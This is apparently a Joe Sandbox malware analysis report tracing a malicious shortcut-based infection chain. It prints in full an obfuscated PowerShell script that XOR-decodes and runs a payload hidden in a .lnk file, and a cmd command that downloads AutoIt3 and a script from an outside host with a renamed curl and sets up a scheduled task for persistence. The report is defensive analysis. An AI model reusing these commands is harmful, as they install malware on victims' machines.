Commandline:	powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:02:10
Start date:	24/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Imagebase:	0x7ff660490000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Analysis Process: conhost.exePID: 7688, Parent PID: 7680

General

Target ID:	5
Start time:	03:02:10
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:02:10
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: attrib.exePID: 7832, Parent PID: 7464

General

Target ID:	7
Start time:	03:02:18
Start date:	24/04/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h c:\GSlLzFnTov
Imagebase:	0x7ff701440000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:02:18
Start date:	24/04/2024
Path:	C:\GSlLzFnTov\GSlLzFnTov.exe
Wow64 process (32bit):	false
Commandline:	GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Imagebase:	0x7ff7f1d90000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:02:20
Start date:	24/04/2024
Path:	C:\GSlLzFnTov\GSlLzFnTov.exe
Wow64 process (32bit):	false
Commandline:	GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Imagebase:	0x7ff7f1d90000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:02:24
Start date:	24/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Imagebase:	0x7ff6a6ed0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:02:25
Start date:	24/04/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h c:\GSlLzFnTov
Imagebase:	0x7ff701440000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:02:25
Start date:	24/04/2024
Path:	C:\GSlLzFnTov\GSlLzFnTov.exe
Wow64 process (32bit):	false
Commandline:	GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Imagebase:	0x7ff700e40000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:02:27
Start date:	24/04/2024
Path:	C:\GSlLzFnTov\GSlLzFnTov.exe
Wow64 process (32bit):	false
Commandline:	GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Imagebase:	0x7ff700e40000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:02:29
Start date:	24/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Imagebase:	0x7ff6a6ed0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FF7C13D4DEC Relevance: 3.0, Strings: 2, Instructions: 537COMMON

Download Yara Rule

Strings

x6{, xrefs: 00007FF7C13D4EFA
x6{, xrefs: 00007FF7C13D4E39

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID: x6{$x6{
API String ID: 0-4022085565
Opcode ID: ce3ab4001bfc95e76bc512c21133e0235a6588eac81dff1f215e97b2447b21ba
Instruction ID: ede0f691820dcf86b3dcfa16d371b7d2eb317653132d06f33ebb76d444d4cbdb
Opcode Fuzzy Hash: ce3ab4001bfc95e76bc512c21133e0235a6588eac81dff1f215e97b2447b21ba
Instruction Fuzzy Hash: E6F18E3191DB895FE70ABB3898565B57BE0EF03234B4802FED48DC71E3E959A806C361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D2C40 Relevance: 1.7, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

C_H, xrefs: 00007FF7C13D2EF0

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID: C_H
API String ID: 0-480754390
Opcode ID: b645dad9131307d43d786b2b43e2c6a0d6cddc42ffc28298b87b8e8b90310a95
Instruction ID: 84c5b9de064fd739a9999e0d64b83dc7e9417f647e8ea6e6493ec056a241de41
Opcode Fuzzy Hash: b645dad9131307d43d786b2b43e2c6a0d6cddc42ffc28298b87b8e8b90310a95
Instruction Fuzzy Hash: A3D1443191CA894FD795EF2898546A4BBE1FF5A324B4802FFD44DC7193DA28AC06C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D2C56 Relevance: 1.6, Strings: 1, Instructions: 335COMMON

Download Yara Rule

Strings

C_H, xrefs: 00007FF7C13D2EF0

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID: C_H
API String ID: 0-480754390
Opcode ID: 8ada73d076385e51203b0960dc534a5e962b7b3136d1ad928eab7d39ee87098f
Instruction ID: 1cb352e62144d27ace111b8fe30017cbdfed6b588b7d2ac8e11bda6942198908
Opcode Fuzzy Hash: 8ada73d076385e51203b0960dc534a5e962b7b3136d1ad928eab7d39ee87098f
Instruction Fuzzy Hash: 0BB1043191DAC54FD396EF3888542A4BFE1EF5A224B4901FFD48DCB1A3DA58AC0AC751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D47B1 Relevance: .8, Instructions: 846COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c2749e8d5186af386360744844a33c625d70ff43a13a3c2d11d02caeae8d88
Instruction ID: 9c85fc47e9d9c03ed6022ad818081111463d731cceb564476f0212aefb1d18d1
Opcode Fuzzy Hash: 74c2749e8d5186af386360744844a33c625d70ff43a13a3c2d11d02caeae8d88
Instruction Fuzzy Hash: C252E231A1DA898FEB98FF288854A64B7E1FF95314B9401BDC00ECB683DE25AC45C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D2221 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a4756ce06d8a45ec105df1d290ca55489a412e7622f6098bc18d17d037a46c
Instruction ID: 667211de5fb43b6a713cd58ad87f83226286b64382a52de37dd29761770d5ece
Opcode Fuzzy Hash: 92a4756ce06d8a45ec105df1d290ca55489a412e7622f6098bc18d17d037a46c
Instruction Fuzzy Hash: B0C12531A1DA8A4FD799EF2898646B4BBE1FF56324B8801BED40DC71D3DE189C05C355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D32A2 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4cb58dce58f39f49514c81d2815ed75f2c8ada9ddd323f168f41b722eb59c0
Instruction ID: 571454cfa48dc5363dcde37b4b59840feef8c461a47624409dec4f5cfcf53764
Opcode Fuzzy Hash: bb4cb58dce58f39f49514c81d2815ed75f2c8ada9ddd323f168f41b722eb59c0
Instruction Fuzzy Hash: A1615672E1DA894FE795FB2C58196B5BBE1EF46224B4841BFC40DCB293DD48AC02C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D23D2 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba3c3b794a73522ea9c379c56c4ec68dbb78c942450eb2a3037b2618d05949c
Instruction ID: f949b44ffc75609a1e89537570f03b0201876a1fff9858958235b7c85034d39a
Opcode Fuzzy Hash: 5ba3c3b794a73522ea9c379c56c4ec68dbb78c942450eb2a3037b2618d05949c
Instruction Fuzzy Hash: A1310A71E2D98A4FE758BB2C54606B8B2E1FF48768FD4027DE80ED32C3DE18A8044255

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D5107 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a4643b1fa7084ff38a98b83c77c7dd0eb58b04e6d53d5ab442c0c81c00fc7d
Instruction ID: 565de1ea01412d9cdf2f8a82af3ff56722e7cf45e7459de709322c5ef84c426a
Opcode Fuzzy Hash: b8a4643b1fa7084ff38a98b83c77c7dd0eb58b04e6d53d5ab442c0c81c00fc7d
Instruction Fuzzy Hash: 0811E932E3DD06CBBB98B92C6551179A3E1FF44234FD8017DE40EC3586DD496C110571

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C13D337A Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702e827c8fa1aab154412f7f0d8e9aa9583817ffda438e5549e58a0f1ecc2512
Instruction ID: 049624e6d79379640a2750dd8c52eef04dee00f10e76e1f056167c3695a6ca33
Opcode Fuzzy Hash: 702e827c8fa1aab154412f7f0d8e9aa9583817ffda438e5549e58a0f1ecc2512
Instruction Fuzzy Hash: 5B01D472F1E90A4FE798FA1C1554578A2C2EF8823579840BED40EC7396DD49EC004350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C1303475 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1387065060.00007FF7C1300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7c1300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
Instruction ID: 092f8a8f7d7aff4f0ee4d527a4556aaf73a2813d153e8814bee2a16a6b4de583
Opcode Fuzzy Hash: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
Instruction Fuzzy Hash: E101677111CB0C4FD744EF0CE491AA5B7E0FB99364F50056EE58AC7651DB36E881CB45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: GSlLzFnTov.exePID: 7848, Parent PID: 7464COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.1%
Total number of Nodes:	1950
Total number of Limit Nodes:	41

Executed Functions

Function 00007FF7F1DDCB60 Relevance: 74.0, APIs: 25, Strings: 17, Instructions: 539encryptionfileCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DDCE22

Part of subcall function 00007FF7F1DDC9AC: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DDC9D5
Part of subcall function 00007FF7F1DDC9AC: _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DDC9FA
Part of subcall function 00007FF7F1DDC9AC: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DDCAF5

fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DDCE6B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DDCF01
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DDCF1E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DDCF35
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DDCF63
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DDCF74
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DDCFCA
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7F1DDD080
PFXImportCertStore.CRYPT32 ref: 00007FF7F1DDD09A
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DDD0D0
CertFindCertificateInStore.CRYPT32 ref: 00007FF7F1DDD12E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DDD142
CertCloseStore.CRYPT32 ref: 00007FF7F1DDD162
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DDD186
CertOpenStore.CRYPT32 ref: 00007FF7F1DDD1B7
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DDD1C5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DDD200
CryptStringToBinaryA.CRYPT32 ref: 00007FF7F1DDD255
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DDD26B
CertFindCertificateInStore.CRYPT32 ref: 00007FF7F1DDD294
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DDD2A7
CertCloseStore.CRYPT32 ref: 00007FF7F1DDD2D0
CertFreeCertificateContext.CRYPT32 ref: 00007FF7F1DDD316
CertFreeCertificateContext.CRYPT32 ref: 00007FF7F1DDD3A2

Strings

schannel: Failed to open cert store %x %s, last error is 0x%x, xrefs: 00007FF7F1DDD1CE
schannel: Failed to read cert file %s, xrefs: 00007FF7F1DDCF8C
P12, xrefs: 00007FF7F1DDCE95
schannel: Failed to get certificate from file %s, last error is 0x%x, xrefs: 00007FF7F1DDD14B
schannel: unable to allocate memory, xrefs: 00007FF7F1DDD2FD
Microsoft Unified Security Protocol Provider, xrefs: 00007FF7F1DDD378
schannel: enabled automatic use of client certificate, xrefs: 00007FF7F1DDCCB5
schannel: Failed to import cert file %s, last error is 0x%x, xrefs: 00007FF7F1DDD105
SSL versions not supported, xrefs: 00007FF7F1DDCD0A
Unrecognized parameter passed via CURLOPT_SSLVERSION, xrefs: 00007FF7F1DDCCF1
schannel: certificate format compatibility error for %s, xrefs: 00007FF7F1DDCEBD
schannel: AcquireCredentialsHandle failed: %s, xrefs: 00007FF7F1DDD3BD
(memory blob), xrefs: 00007FF7F1DDCEA7, 00007FF7F1DDCEE6
schannel: Failed to get certificate location or file for %s, xrefs: 00007FF7F1DDD174
Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 00007FF7F1DDCDA9
schannel: disabled automatic use of client certificate, xrefs: 00007FF7F1DDCCA6
schannel: Failed to import cert file %s, password is bad, xrefs: 00007FF7F1DDD0E1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Cert$Store$free$Certificate$ErrorLast$CloseContextFindFree_mbschrfseek$BinaryByteCharCryptImportMultiOpenStringWide_mbsnbcmp_strdupfclosefopenfreadftell
String ID: (memory blob)$Microsoft Unified Security Protocol Provider$P12$SSL versions not supported$Unable to set ciphers to passed via SSL_CONN_CONFIG$Unrecognized parameter passed via CURLOPT_SSLVERSION$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: certificate format compatibility error for %s$schannel: disabled automatic use of client certificate$schannel: enabled automatic use of client certificate$schannel: unable to allocate memory
API String ID: 1231573371-2016555727
Opcode ID: 1430246b4e4cbeb4b7d061ab38bc49f463022b2ac335cc07986ed133e16f4c5b
